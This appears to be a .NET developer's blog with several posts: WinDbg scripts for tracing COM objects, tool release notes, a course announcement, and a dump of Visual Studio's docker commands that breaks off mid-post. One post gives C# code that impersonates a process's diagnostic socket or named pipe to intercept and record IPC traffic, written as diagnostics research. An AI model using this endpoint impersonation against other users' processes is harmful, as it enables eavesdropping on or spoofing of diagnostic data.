009cfe14  009cfe3c
009cfe18  36e9dfe6
009cfe1c  00e8b3e0
   +0x000 Data1            : 0xeff8970e
   +0x004 Data2            : 0xc50f
   +0x006 Data3            : 0x45e0
   +0x008 Data4            : [8]  "???"
   +0x000 Data1            : 0x246a22d5
   +0x004 Data2            : 0xcf02
   +0x006 Data3            : 0x44b2
   +0x008 Data4            : [8]  "???"
==> obj addr: 009cfe3c
ModLoad: 76fb0000 7702e000   C:\Windows\System32\clbcatq.dll
ModLoad: 618b0000 618b9000   C:\Windows\SYSTEM32\ktmw32.dll
ModLoad: 76df0000 76e66000   C:\Windows\System32\sechost.dll
ModLoad: 75c40000 75cbb000   C:\Windows\System32\ADVAPI32.dll
ModLoad: 031a0000 031ae000   C:\Users\me\repos\protoss-com-example\Release\protoss.dll
Breakpoint 1 hit
eax=00000000 ebx=00628000 ecx=00e84ea0 edx=00000000 esi=00e84310 edi=00e8b3e0
eip=008c36ae esp=009cfe18 ebp=009cfe58 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
ProtossComClient!start_from_probe+0x23 [inlined in ProtossComClient!main+0x6e]:
008c36ae 8b4d04          mov     ecx,dword ptr [ebp+4] ss:002b:009cfe5c=008c56b1

In the output, we can find CLSID (eff8970e-c50f-45e0-9284-291ce5a6f771), IID (246a22d5-cf02-44b2-bf09-aab95a34e0cf) and the created object address: 010ff620. Before we start examining it, we need to check the returned status code. We can do that with the !error @$retreg command (or look at the eax/rax register). If it’s 0 (S_OK), we may set breakpoints on the returned object methods. As each COM object implements at least one interface (virtual class), it will have at least one virtual method table. Thanks to the CoCreateInstance breakpoint, we know the queried IID, and we may find the interface method list in the associated type library. If we don’t have access to the type library (or our IID is IID_IUnknown), we still may learn something about this object by placing breakpoints on the IUnknown interface methods (as you remember, all COM interfaces need to implement it):

struct IUnknown
    virtual HRESULT STDMETHODCALLTYPE QueryInterface( 
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject) = 0;

    virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;

    virtual ULONG STDMETHODCALLTYPE Release( void) = 0;

The breakpoint is very similar to what we did for CoCreateInstace. The code snippet below presents the 32- and 64-bit versions:

bp 031a6160 "dt ntdll!_GUID poi(@esp + 8); .printf /D \"==> obj addr: %p\", poi(@esp + C);.echo; bp /1 @$ra; g"

bp 00007ffe`1c751e6a "dt ntdll!_GUID @rdx; .printf /D \"==> obj addr: %p\", @r8;.echo; bp /1 @$ra; g"

Let me show you how I got the address of the QueryInterface function for the 32-bit breakpoint (031a6160). The first four bytes at the object address (009cfe3c) point to the virtual method table. We may find the vtable address by calling dpp 009cfe3c L1:

0:000> dpp 009cfe3c L1
009cfe3c  00e84ea0 031a860c protoss!Probe::`vftable'

We can now dump the content of the vtable:

0:000> dps 031a860c L4
031a860c  031a6160 protoss!Probe::QueryInterface
031a8610  031a6070 protoss!Probe::AddRef
031a8614  031a60b0 protoss!Probe::Release
031a8618  031a6260 protoss!Probe::ConstructBuilding

I knew that the IProbe interface (246A22D5-CF02-44B2-BF09-AAB95A34E0CF) has four methods (the first three coming from the IUnknown interface). Without this knowledge, I would have printed only the first three methods (QueryInterface, AddRef, and Release).

On each QueryInterface return, we may again examine the status code and returned object. The output below presents a QueryInterface hit for an IProbe instance. Let’s spend a moment analyzing it:

   +0x000 Data1            : 0x59644217
   +0x004 Data2            : 0x3e52
   +0x006 Data3            : 0x4202
   +0x008 Data4            : [8]  "???"
==> obj addr: 009cfe00
Breakpoint 2 hit
eax=00000000 ebx=00628000 ecx=5a444978 edx=00000000 esi=00e84310 edi=00e8b3e0
eip=008c34f6 esp=009cfdec ebp=009cfe10 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
008c34f6 8bf0            mov     esi,eax

The 59644217-3e52-4202-ba49-f473590cc61a GUID represents the IGameObject interface. If you scroll up to the class definitions, you will find that it’s the second interface that the Probe class implements. The vtable at the object address looks as follows:

0:000> dpp 009cfe00 L1
009cfe00  00e84ea4 031a8620 protoss!Probe::`vftable'
0:000> dps 031a8620 L6
031a8620  031a5c40 protoss![thunk]:Probe::QueryInterface`adjustor{4}'
031a8624  031a5c72 protoss![thunk]:Probe::AddRef`adjustor{4}'
031a8628  031a5c4a protoss![thunk]:Probe::Release`adjustor{4}'
031a862c  031a36f0 protoss!Probe::get_Name
031a8630  031a3720 protoss!Probe::get_Minerals
031a8634  031a3740 protoss!Probe::get_BuildTime

You may now be wondering what the adjustor methods are? If we decompile any of them, we will find an interesting assembly code:

0:000> u 031a5c40
031a5c40 836c240404      sub     dword ptr [esp+4],4
031a5c45 e916050000      jmp     protoss!Probe::QueryInterface (031a6160)

To better understand what’s going on here, let’s put the last dpp commands (after CoCreateInstance and QueryInterface) next to each other:

0:000> dpp 009cfe3c L1
009cfe3c 00e84ea0 031a860c protoss!Probe::`vftable' <- CoCreateInstance
0:000> dpp 009cfe00 L1
009cfe00 00e84ea4 031a8620 protoss!Probe::`vftable' <- QueryInterface

In the above output, we see that QueryInterface for IProbe (called by CoCreateInstance) sets the object pointer to the address 00e84ea0. While QueryInterface for IGameObject sets the object pointer to the address 00e84ea4 (four bytes further). And both calls were made on the same instance of the Probe class. Looking at the QueryInterface source code, we can see that this difference is caused by a static_cast:

HRESULT __stdcall Probe::QueryInterface(REFIID riid, void** ppv) {
	std::cout << "Component: Nexus::QueryInterface: " << riid << std::endl;

	if (riid == IID_IUnknown || riid == __uuidof(IProbe)) {
		*ppv = static_cast<IProbe*>(this);
	} else if (riid == __uuidof(IGameObject)) {
		*ppv = static_cast<IGameObject*>(this);
	} else {
		*ppv = NULL;
	return S_OK;

The instruction *ppv = static_cast<IProbe*>(this) is here equivalent to *ppv = this, as IProbe is the default (first) interface of the Probe class, and a pointer to its vtable occupies the first four bytes of the Probe instance memory. IGameObject is the second interface and a pointer to its vtable occupies the next four bytes of the Probe instance memory. After these two vtables, we can find fields of the Probe class. I draw the diagram below to better visualize these concepts:

So, what are those adjustors in the IGameObject vtable? Adjustors allow the compiler to reuse the IUnknown methods already compiled for the IProbe implementation. The only problem with reusing is that methods implementing IProbe expect this to point to the beginning of the Probe class instance. So we can’t simply use their addresses in the IGameObject vtable – we need first to adjust the this pointer. And that’s what the sub dword ptr [esp+4],4 instruction is doing. Then, we can safely jump to the IProbe‘s QueryInterface implementation, and everything will work as expected.

To end the vtables discussion, I have one more WinDbg script for you:

.for (r $t0 = 0; @$t0 < N; r $t0= @$t0 + 1) { bp poi(VTABLE_ADDRESS + @$t0 * @$ptrsize) }

This script sets breakpoints on the first N methods of a given vtable (replace N with any number you need). For example, to break on all the methods of the IGameObject interface, I would run:

.for (r $t0 = 0; @$t0 < 6; r $t0= @$t0 + 1) { bp poi(031a8620 + @$t0 * @$ptrsize) }

We may also track COM objects from a specific DLL. When the application loads the target DLL, we need to set a breakpoint on the exported DllGetClassObject function. For example, let’s debug what is happening when we call CoCreateInstance for the Probe COM object. We start by setting a break on the protoss.dll load:

0:000> sxe ld:protoss.dll
0:000> g
ModLoad: 66c90000 66cd4000   C:\temp\protoss-com-example\Debug\protoss.dll

Next, we set a breakpoint on the protoss!DllGetClassObject function and wait for it to hit:

0:000> bp protoss!DllGetClassObject "dps @esp L8; dt ntdll!_GUID poi(@esp + 4); dt ntdll!_GUID poi(@esp + 8); .printf /D \"==> obj addr: %p\", poi(@esp+c);.echo; bp /1 @$ra; g"
0:000> g
009cea10  75d6b731 combase!CClassCache::CDllPathEntry::GetClassObject+0x5a [onecore\com\combase\objact\dllcache.cxx @ 2581]
009cea14  00e9f354
009cea18  75ce84c8 combase!IID_IClassFactory
009cea1c  009cec40
009cea20  00000000
009cea24  00e9b3f8
009cea28  75ce84c8 combase!IID_IClassFactory
009cea2c  00e9f354
   +0x000 Data1            : 0xeff8970e
   +0x004 Data2            : 0xc50f
   +0x006 Data3            : 0x45e0
   +0x008 Data4            : [8]  "???"
   +0x000 Data1            : 1
   +0x004 Data2            : 0
   +0x006 Data3            : 0
   +0x008 Data4            : [8]  "???"
==> obj addr: 009cec40
Breakpoint 1 hit

We can see that CoCreateInstance uses the Probe class CLSID and asks for the IClassFactory instance. IClassFactory inherits from IUnknown (as all COM interfaces) and contains only two methods:

struct IClassFactory : public IUnknown
    virtual HRESULT STDMETHODCALLTYPE CreateInstance( 
        _In_opt_  IUnknown *pUnkOuter, _In_  REFIID riid, _COM_Outptr_  void **ppvObject) = 0;
    virtual HRESULT STDMETHODCALLTYPE LockServer(/* [in] */ BOOL fLock) = 0;

Let’s set a breakpoint on the CreateInstance method and continue execution:

0:000> dpp 009cec40 L1
009cec40  031ab020 031a863c protoss!ProtossObjectClassFactory<Probe,IProbe>::`vftable'
0:000> dps 031a863c L5
031a863c  031a45e0
031a8640  031a45d0
031a8644  031a45d0
031a8648  031a4500
031a864c  031a44f0
0:000> bp 031a4500 "dt ntdll!_GUID poi(@esp + c); .printf /D \"==> obj addr: %p\", poi(@esp + 10);.echo; bp /1 @$ra; g"
0:000> g
   +0x000 Data1            : 0x246a22d5
   +0x004 Data2            : 0xcf02
   +0x006 Data3            : 0x44b2
   +0x008 Data4            : [8]  "???"
==> obj addr: 009cec58
Breakpoint 3 hit

Our breakpoint gets hit, and we see that the requested IID equals IID_IProbe, which proves what I mentioned previously, that CoCreateInstance internally uses an IClassFactory instance to create a new Probe class instance.

Finally, when we deal with COM automation and need to decode parameters passed to the IDispatch instance, we may use the dt -r1 combase!tagVARIANT ARG_ADDRESS command. It nicely formats all the VARIANT fields but requires the combase.dll symbols.

We reached the end of this long post, and I hope I haven’t bored you too much 😅 I also hope that the presented materials will help you better understand and troubleshoot COM APIs. The source code of the Protoss COM example is available at https://github.com/lowleveldesign/protoss-com-example.

Until the next time! 👋



New releases of my open-source tools

29 July 2021 at 06:48

I made several updates to my open-source tools in the last four weeks, and I also released one new tool. In this post, I will describe those updates briefly, including some discoveries I made along the way.


The biggest news is the release of dotnet-wtrace, a new tool in the wtrace toolkit. I created it because I could not find a tool that would show the runtime (and not only) events in real-time. Dotnet-wtrace does not simply dump the events data but processes it to make the output easily readable. Below, you may see an example screenshot containing GC events from an ASP.NET Core application.

Besides GC events, dotnet-wtrace will display exceptions, loader, ASP.NET Core, EF Core, and network events. The documentation also describes its various filtering capabilities.

Dotnet-wtrace is entirely implemented in F# and relies on Microsoft.Diagnostics.NETCore.Client and Microsoft.Diagnostics.Tracing.TraceEvent libraries. I must admit I enjoy coding in F# greatly. F# might be a bit hard to grasp at first, especially if you’re new to functional programming, but the benefits of learning it are numerous. Keeping your variables immutable, avoiding nulls, and writing stateless code whenever possible will make your apps only safer. F# compiler won’t allow implicit conversions and will complain about all unhandled conditions. The list of benefits is much longer 🙂 I also find F# syntax more concise and consistent than C# one. If I gained your interest and you want to experiment with F#, I recommend the Get Programming with F# book by Isaac Abraham – it helped me a lot in the beginning. Its content was more approachable than other materials available on the Internet. I deviated from the main subject of this post, so let’s get back to dotnet-wtrace. The features I miss most in the current version are call stacks for exceptions and summary statistics. I plan to add them in future tool releases, so please subscribe to the wtrace newsletter to be the first to try them 🙂


I also made minor updates to wtrace , allowing it to trace image loader (issue #15) and UDP events. Additionally, I published a wtrace package to Chocolatey (issue #13), so if you’re using this package manager, you may install wtrace with this simple command: choco install wtrace.

procgov (Process Governor)

There were some significant changes in the procgov tool to implement the feature requested by ba-tno (btw., the issue description is excellent). It is now possible to update the process limits by rerunning procgov with new parameter values. When working on this feature, I discovered interesting behavior of the Windows job objects – with the last handle to the job object closed, the job disappears from the Object Manager (you can’t open it by name), but its limits still apply to the process. To overcome this problem, I’m now duplicating the created job handle in the target process to keep the job accessible.

I’ve planned to refactor the procgov codebase for some time already, and I finally found a moment to do that. Thanks to the CsWin32 project, I could remove lots of boilerplate PInvoke code. I was surprised by how smoothly the CsWin32 code generators worked in Visual Studio 2019. Interestingly, the code generators retrieve the signatures from the win32metadata assembly, generated with the help of the ClangSharp project. Some signatures are maybe a bit more complex to use than in my older manual setup, but I prefer to spend a minute longer writing the call instruction than 20 minutes on preparing the PInvoke signature. I also split the stateful, hard-to-maintain ProcessGovernor class into two static (stateless) types: ProcessModule and Win32JobModule, which use a shared SessionSettings object (lesson learned from functional programming :)). The code is now easier to understand and modify.

It should also be soon possible to install procgov with Chocolatey. Its package is awaiting approval. Moreover, I moved the procgov build from Azure Devops to GitHub Actions and added steps to keep the Chocolatey package in sync with the main repo.

I hope you’ll find the new features and tools helpful, and if you have any ideas for improvements, let me know or create an issue in the tool repository. Thank you.


.NET Diagnostics Expert course

9 June 2021 at 07:24

Last week we published the final module of the .NET Diagnostics Expert Course:

I’m excited and happy that it’s finally available. But I’m also relieved as there were times when I thought it would never happen 🙂 In this post, I want to share some details about the course and why I decided to make it.

How it all started

It was my plan for a long time to publish a course on .NET diagnostics. However, I have never found enough time to focus on it, and apart from handling a few free training sessions for the devWarsztaty initiative, I hadn’t made much progress in realizing it. So what changed last year? Firstly, in late summer, I decided to leave Turbo.net and focus on learning and my private projects, most importantly wtrace. I finally published https://wtrace.net and started working on a new wtrace release and other tracing tools. Three weeks passed, and while talking with Szymon, the idea of a .NET diagnostics course emerged. I thought that the timing would never be better, so I drafted the course plan, and Konrad published the https://diagnosticsexpert.com site. Then I prepared two webinars, and Dotnetos started the presale of the course at the beginning of December. I was under stress that the interest would be low and not many people will find the subject interesting. The presale, however, went very well (thank you all who put trust in me!), giving me some relief.


And then the recordings started. At first, I tried recording the lessons as I was presenting the slides. It did not work very well, and every lesson took me hours to complete. My wife took pity on me and browsed tutorials for starting YouTubers to find that they often use transcripts. And thus, I began writing transcripts 🙂 That made the lesson preparation longer, but the recording time was much more manageable. Unfortunately, transcripts did not work for DEMOs, so they still required hours in front of the microphone. Another problem with DEMOs is that they are not always entirely predictable. Sometimes, during the DEMO, I received an output I haven’t thought of or, even worse, discovered a bug in the diagnostics tool. Once I had raw materials ready, Konrad and Paulina reviewed them, and Andrzej processed the videos. Konrad then watched the final recordings, making sure they do not contain any repetitions or other issues.

There were various problems I hit along the way. In the first month, my camera broke. And, as I didn’t want to lose any time, I created a temporary solution:

The positive side of it is that you may see that the course has solid fundaments! 🙂 I also spilled tea on my laptop (thankfully, it survived after drying) and corrupted my drive when testing diskspd (entirely my fault – I shouldn’t be doing it after midnight). Fortunately, the backup worked.

What’s in the course

Having covered the course making, let me describe to you the course content. When preparing the lessons, I focused on practicality, presenting techniques and tools which you may employ to diagnose various .NET (and not only) problems. There are 11 modules in the course:

  • Module 1, “Debugging,” describes the building blocks of a debugger, symbol files management, and features of Debuggers, both managed (VS, VS Code) and native (WinDbg, LLDB)
  • Module 2, “Tracing,” focuses on Event Tracing for Windows, Linux tracing APIs (perf, LTTng, eBPF), and .NET Event Pipes
  • Module 3, “Windows and Linux diagnostic sources,” covers various applications to monitor processes on Windows and Linux (including ps, top, htop, Process Hacker)
  • Module 4, “High CPU usage,” describes ways of troubleshooting CPU-related issues, including CPU sampling, thread time (clock time) profiling, and .NET Profiling API
  • Module 5, “Deadlocks,” covers techniques for troubleshooting deadlocks and waits using memory dumps and trace-based wait analysis
  • Module 6, “Network issues – TCP, UDP,” concentrates on monitoring TCP and UDP connections and troubleshooting various connectivity issues (including slow server responses, dropped connections, or intermittent network errors). Apart from typical network tracing tools such as Wireshark or tcpdump, we also use .NET network traces.
  • Module 7, “Network issues – DNS, HTTP(S),” is about troubleshooting issues in higher layer protocols: DNS, HTTP, and TLS. Apart from system tools, I also cover ASP.NET Core and Kestrel logs. In this module, we also implement and use various network proxies to intercept and modify the traffic.
  • Module 8, “Application execution issues,” targets assembly loading issues, exceptions, and production debugging techniques (including system image preparations, automatic dump collection, and remote debugging)
  • Module 9, “Miscellaneous issues,” describes diagnosing memory, File I/O, and some other issues. It also lists final tips and tricks for troubleshooters.
  • Module 10, “Diagnostics logs in the application,” shows ways of how we can interact with the debugger from within the application and how we may publish custom performance traces.
  • Module 11, “Writing custom diagnostics tools,” covers usage of ClrMD, Diagnostics Client, and TraceEvent libraries to write our custom diagnostics tools.

As you maybe noticed, the first three modules present general concepts and tools, while the subsequent six modules focus on various diagnostics cases. Finally, the last two modules are about implementing code for diagnosing purposes. Each module ends with homework exercises. I wanted them to be challenging and resemble problems I observed in the production. And, as it’s a practical course, I spent a lot of time in DEMOs.

Although the course concentrates on .NET, many presented techniques could be employed to troubleshoot native applications or even system problems. I also believe that debugging, tracing, and reading source code (if it’s available, of course) are the best ways to learn how libraries and applications function.

Final words

In the end, I would like to thank Dotnetos, in particular, Konrad, for the endless hours he spent reviewing the videos and slides. It was a huge and challenging project that occupied me for the last six months (two months more than initially anticipated :)). But I’m happy with the final result, and I hope that those who decide to participate in it will enjoy the prepared materials.



Snooping on .NET EventPipes

20 January 2021 at 12:03

While playing with EventPipes, I wanted to better understand the Diagnostic IPC Protocol. This protocol is used to transfer diagnostic data between the .NET runtime and a diagnostic client, such as, for example, dotnet-trace. When a .NET process starts, the runtime creates the diagnostic endpoint. On Windows, the endpoint is a named pipe, and on Unix, it’s a Unix domain socket created in the temp files folder. The endpoint name begins with a ‘dotnet-diagnostic-’ string and then contains the process ID to make it unique. The name also includes a timestamp and a ‘-socket’ suffix on Unix. Valid example names are dotnet-diagnostic-2675 on Windows and dotnet-diagnostic-2675-2489049-socket on Unix. When you type the ps subcommand in any of the CLI diagnostics tools (for example, dotnet-counters ps), the tool internally lists the endpoints matching the pattern I just described. So, essentially, the following commands are a good approximation to this logic:

# Linux
$ ls /tmp/dotnet-diagnostic-*
/tmp/dotnet-diagnostic-213-11057-socket /tmp/dotnet-diagnostic-2675-2489049-socket
# Windows
PS me> [System.IO.Directory]::GetFiles("\\.\pipe\", "dotnet-diagnostic-*")

The code for the .NET process listing is in the ProcessStatus.cs file. After extracting the process ID from the endpoint name, the diagnostics tool creates a Process class instance to retrieve the process name for printing. Armed with this knowledge, let’s try to intercept the communication between the tracer and the tracee.

Neither named pipes nor Unix domain sockets provide an API to do that easily. I started looking for the interceptors for either the kernel or user mode. I found a few interesting projects (for example, NpEtw), but I also discovered that configuring them would take me lots of time. I then stumbled upon a post using socat to proxy the Unix domain socket traffic. I wondered if I could write a proxy too.

Writing an EventPipes sniffer

The only problem was how to convince the .NET CLI tools to use my proxy. I did some tests, and on Linux, it’s enough to create a Unix domain socket with the same process ID but with the timestamp set to, for example, 1.

Let’s take as an example a .NET process with ID equal to 2675. Its diagnostic endpoint is represented by the /tmp/dotnet-diagnostic-2675-2489049-socket file. In my proxy, I am creating a Unix domain socket with a path /tmp/dotnet-diagnostic-2675-1-socket. The file system will list it first, and dotnet-trace (or any other tool) will pick it up as the endpoint for the process with ID 2675:

The code to create the proxy socket looks as follows:

private static async Task StartProxyUnix(int pid, CancellationToken ct)
    var tmp = Path.GetTempPath();
    var snoopedEndpointPath = Directory.GetFiles(tmp, $"dotnet-diagnostic-{pid}-*-socket").First();
    var snoopingEndpointPath = Path.Combine(tmp, $"dotnet-diagnostic-{pid}-1-socket");


    var endpoint = new UnixDomainSocketEndPoint(snoopingEndpointPath);
    using var listenSocket = new Socket(endpoint.AddressFamily, SocketType.Stream, ProtocolType.Unspecified);

    using var r = ct.Register(() => listenSocket.Close());

        var id = 1;
        while (!ct.IsCancellationRequested)

            if (ct.IsCancellationRequested)

            var socket = await listenSocket.AcceptAsync();
            Console.WriteLine($"[{id}]: s1 connected");

            // random remote socket
            var senderSocket = new Socket(AddressFamily.Unix, SocketType.Stream, ProtocolType.Unspecified);
            await senderSocket.ConnectAsync(new UnixDomainSocketEndPoint(snoopedEndpointPath));
            Console.WriteLine($"[{id}]: s2 connected");

            _ = SniffData(new NetworkStream(socket, true), new NetworkStream(senderSocket, true), id, ct);
            id += 1;
    catch (SocketException)
        /* cancelled listen */
        Console.WriteLine($"Stopped ({snoopingEndpointPath})");

On Windows, it’s more complicated as there is no timestamp in the name. Thus, I decided to create a fake diagnostics endpoint that will look like an endpoint for a regular .NET process but, in reality, will be a proxy. Remember that CLI tools also call the Process.GetProcessById method, so the PID in my endpoint name must point to a valid process accessible to the current user. The process must be native, so the diagnostic endpoint name is not already taken. I picked explorer.exe 😊, and to record EventPipes traffic, I will use explorer as the target process in .NET CLI tools, as on the image below:

And the code for creating my proxy named pipe looks as follows:

private static async Task StartProxyWindows(int pid, CancellationToken ct)
    var targetPipeName = $"dotnet-diagnostic-{pid}";
    var explorer = Process.GetProcessesByName("explorer").First();
    var pipeName = $"dotnet-diagnostic-{explorer.Id}";
        var id = 1;
        while (!ct.IsCancellationRequested)
            var listener = new NamedPipeServerStream(pipeName, PipeDirection.InOut, 10, PipeTransmissionMode.Byte,
                                    PipeOptions.Asynchronous, 0, 0);
            await listener.WaitForConnectionAsync(ct);
            Console.WriteLine($"[{id}]: s1 connected");

            if (ct.IsCancellationRequested)
            var sender = new NamedPipeClientStream(".", targetPipeName, PipeDirection.InOut, PipeOptions.Asynchronous);
            await sender.ConnectAsync();
            Console.WriteLine($"[{id}]: s2 connected");

            _ = SniffData(listener, sender, id, ct);
            id += 1;
    catch (TaskCanceledException)
        Console.WriteLine($"Stopped ({pipeName})");

The fake diagnostic endpoint would work on Linux too, but the timestamp is less confusing. And we can always use our proxy to send some funny trace messages to our colleagues 🤐.

What’s left in our implementation is the forwarding code:

static async Task Main(string[] args)
    if (args.Length != 1 || !int.TryParse(args[0], out var pid))
        Console.WriteLine("Usage: epsnoop <pid>");

    using var cts = new CancellationTokenSource();

    Console.CancelKeyPress += (o, ev) => { ev.Cancel = true; cts.Cancel(); };

    if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
        await StartProxyWindows(pid, cts.Token);
        await StartProxyUnix(pid, cts.Token);

private static async Task SniffData(Stream s1, Stream s2, int id, CancellationToken ct)
    var outstream = File.Create($"eventpipes.{id}.data");
        using var cts = CancellationTokenSource.CreateLinkedTokenSource(ct);
        var tasks = new List<Task>() {
            Forward(s1, s2, outstream, $"{id}: s1 -> s2", cts.Token),
            Forward(s2, s1, outstream, $"{id}: s2 -> s1", cts.Token)

        var t = await Task.WhenAny(tasks);

        var ind = tasks.IndexOf(t);
        Console.WriteLine($"[{id}]: s{ind + 1} disconnected");


        await Task.WhenAny(tasks);
        Console.WriteLine($"[{id}]: s{1 - ind + 1} disconnected");
    catch (TaskCanceledException) { }

private static async Task Forward(Stream sin, Stream sout, Stream snoop, string id, CancellationToken ct)
    var buffer = new byte[1024];
    while (true)
        var read = await sin.ReadAsync(buffer, 0, buffer.Length, ct);
        if (read == 0)
        Console.WriteLine($"[{id}] read: {read}");
        snoop.Write(buffer, 0, read);
        await sout.WriteAsync(buffer, 0, read, ct);

I’m saving the recorded traffic to the eventpipes.{stream-id}.data file in the current directory. The code of the application is also in the epsnoop folder in my diagnostics-tools repository.

Analyzing the EventPipes traffic

I also started working on the 010 Editor template. At the moment, it only understands IPC messages, but, later, I would like to add parsers for some of the diagnostic sequences as well (feel free to create a PR if you work on them too!). The template is in the debug-recipes repository, and on a screenshot below, you can see the initial bytes sent by the dotnet-counters monitor command:



How Visual Studio debugs containerized apps

16 December 2020 at 07:30

Recently, I was looking into the internals of the Visual Studio debugger for the .NET Diagnostics Expert course. I was especially interested in how the Docker debugging works. For those of you who haven’t tried it yet, let me provide a concise description.

In Visual Studio 2019, when we work on the ASP.NET Core project, it is possible to create a launch profile that points to a Docker container, for example:

And that’s fantastic as we can launch the container directly from Visual Studio. And what’s even better, we can debug it! To make this all work, Visual Studio requires a Dockerfile in the root project folder. The default Dockerfile (which you can create in the ASP.NET Core application wizard) looks as follows:

FROM mcr.microsoft.com/dotnet/core/aspnet:3.1-buster-slim AS base

FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster AS build
COPY ["WebApplication1.csproj", ""]
RUN dotnet restore "./WebApplication1.csproj"
COPY . .
WORKDIR "/src/."
RUN dotnet build "WebApplication1.csproj" -c Release -o /app/build

FROM build AS publish
RUN dotnet publish "WebApplication1.csproj" -c Release -o /app/publish

FROM base AS final
COPY --from=publish /app/publish .
ENTRYPOINT ["dotnet", "WebApplication1.dll"]

And that’s it. If we press F5, we land inside an application container, and we can step through our application’s code. It all looks like magic, but as usual, there are protocols and lines of code that run this machinery behind the magical facade. And in this post, we will take a sneak peek at them 😊.

But before we dive in, I need to mention the doc describing how Visual Studio builds containerized apps. It is an excellent read which explains, among many other things, how the debugger binaries land in the docker container and what differences are between Debug and Release builds. This post will focus only on the debugger bits, so please read the doc to have the full picture.

Let’s collect some traces

When I don’t know how things work, I use Process Monitor. In this case, I started the Process Monitor trace, moved back to Visual Studio, and pressed F5. Once the debugger launched, I stopped the trace and started the analysis. In the process tree (Ctrl + T), it was evident that Visual Studio uses the docker.exe client to interact with the Docker containers. I created a filter for the Operation and Path as on the image below:

With these filters in place, I was able to pick the events emitted when a parent process (in our case, Visual Studio and MSBuild) created each of the docker.exe instances:

And I had not only command-line arguments but also the call stacks! Let’s first have a look at the command lines:

"docker" ps --filter "status=running" --filter "id=4a2383dc1a410c425110cd924af9b826d9c50d577eff25d730bc07912f914331" --no-trunc --format {{.ID}} -n 1
"docker" exec -i 4a2383dc1a410c425110cd924af9b826d9c50d577eff25d730bc07912f914331 /bin/sh -c "if PID=$(pidof dotnet); then kill $PID; fi"
"docker" build -f "C:\Users\me\source\repos\WebApplication1\Dockerfile" --force-rm -t webapplication1  --label "com.microsoft.created-by=visual-studio" --label "com.microsoft.visual-studio.project-name=WebApplication1" "C:\Users\me\source\repos\WebApplication1" 
"docker" images -a --filter "reference=webapplication1" --no-trunc --format {{.ID}}
"docker" images --filter "dangling=false" --format "{{json .}}" --digests
"docker" rm -f 4a2383dc1a410c425110cd924af9b826d9c50d577eff25d730bc07912f914331
"docker" run -dt -v "C:\Users\me\vsdbg\vs2017u5:/remote_debugger:rw" -v "C:\Users\me\AppData\Roaming\Microsoft\UserSecrets:/root/.microsoft/usersecrets:ro" -v "C:\Users\me\AppData\Roaming\ASP.NET\Https:/root/.aspnet/https:ro" -e "ASPNETCORE_URLS=https://+:443;http://+:80" -e "ASPNETCORE_ENVIRONMENT=Development" -e "ASPNETCORE_LOGGING__CONSOLE__DISABLECOLORS=true" -P --name WebApplication1 --entrypoint tail webapplication1 -f /dev/null 
"docker" ps --all --format "{{.ID}}"
"docker" inspect --format="{{json .NetworkSettings.Ports}}" 019e9c646683350457a7ee1d30c85b7675a2bab28dc10ead6f851f6eb3963c43
"docker" inspect "019e9c646683"
"docker" exec -i 019e9c646683350457a7ee1d30c85b7675a2bab28dc10ead6f851f6eb3963c43 /bin/sh -c "ID=.; if [ -e /etc/os-release ]; then . /etc/os-release; fi; if [ $ID = alpine ] && [ -e /remote_debugger/linux-musl-x64/vsdbg ]; then VSDBGPATH=/remote_debugger/linux-musl-x64; else VSDBGPATH=/remote_debugger; fi; $VSDBGPATH/vsdbg --interpreter=vscode"
"docker" inspect --format="{{json .NetworkSettings.Ports}}" 019e9c646683350457a7ee1d30c85b7675a2bab28dc10ead6f851f6eb3963c43

We can see that MSBuild disposes the previous container during the build and then creates a new one (docker run). However, what interests us most, regarding our investigation, is the docker exec command. It creates an interactive debugger session in the Docker container. As a side note, notice that the debugger binaries were copied to my home folder (C:\Users\me\vsdbg) – it could be interesting to investigate how they landed there 😊. But moving back to our trace, we can see that we have a running ASP.NET Core app container, and there is an interactive debugging session attached to it. But we still don’t know how Visual Studio communicates with the debugger running in the interactive session. At first, I started looking for some hidden named pipes and WSL API, but couldn’t find anything. Thus, I decided I need to have a more in-depth look at the Visual Studio debugger engine.

As the “docker exec” event came from Visual Studio, it could be the debugger engine that fired the command. So, I copied the call stack from the properties window for this event and looked at the frames (I stripped the unimportant ones):

"0","ntoskrnl.exe","PspCallProcessNotifyRoutines + 0x213","0xfffff8028583759f","C:\WINDOWS\system32\ntoskrnl.exe"
"18","KERNELBASE.dll","CreateProcessW + 0x2c","0x7646da2c","C:\WINDOWS\SysWOW64\KERNELBASE.dll"
"19","System.ni.dll","System.ni.dll + 0x23cc02","0x7252cc02","C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\a94f452eecde0f07e988ad14497426a5\System.ni.dll"
"20","System.ni.dll","System.ni.dll + 0x1aaaa4","0x7249aaa4","C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\a94f452eecde0f07e988ad14497426a5\System.ni.dll"
"21","System.ni.dll","System.ni.dll + 0x1aa39c","0x7249a39c","C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\a94f452eecde0f07e988ad14497426a5\System.ni.dll"
"32","clr.dll","COMToCLRDispatchHelper + 0x28","0x745bf3c1","C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"34","vsdebug.dll","DllGetClassObject + 0x2072e","0x7bc84352","C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Packages\Debugger\vsdebug.dll"
"60","devenv.exe","IsAssertEtwEnabled + 0x12474","0x123d24","C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"
"61","KERNEL32.DLL","BaseThreadInitThunk + 0x19","0x75dafa29","C:\WINDOWS\SysWOW64\KERNEL32.DLL"
"62","ntdll.dll","__RtlUserThreadStart + 0x2f","0x770175f4","C:\WINDOWS\SysWOW64\ntdll.dll"
"63","ntdll.dll","_RtlUserThreadStart + 0x1b","0x770175c4","C:\WINDOWS\SysWOW64\ntdll.dll"

Time to reverse

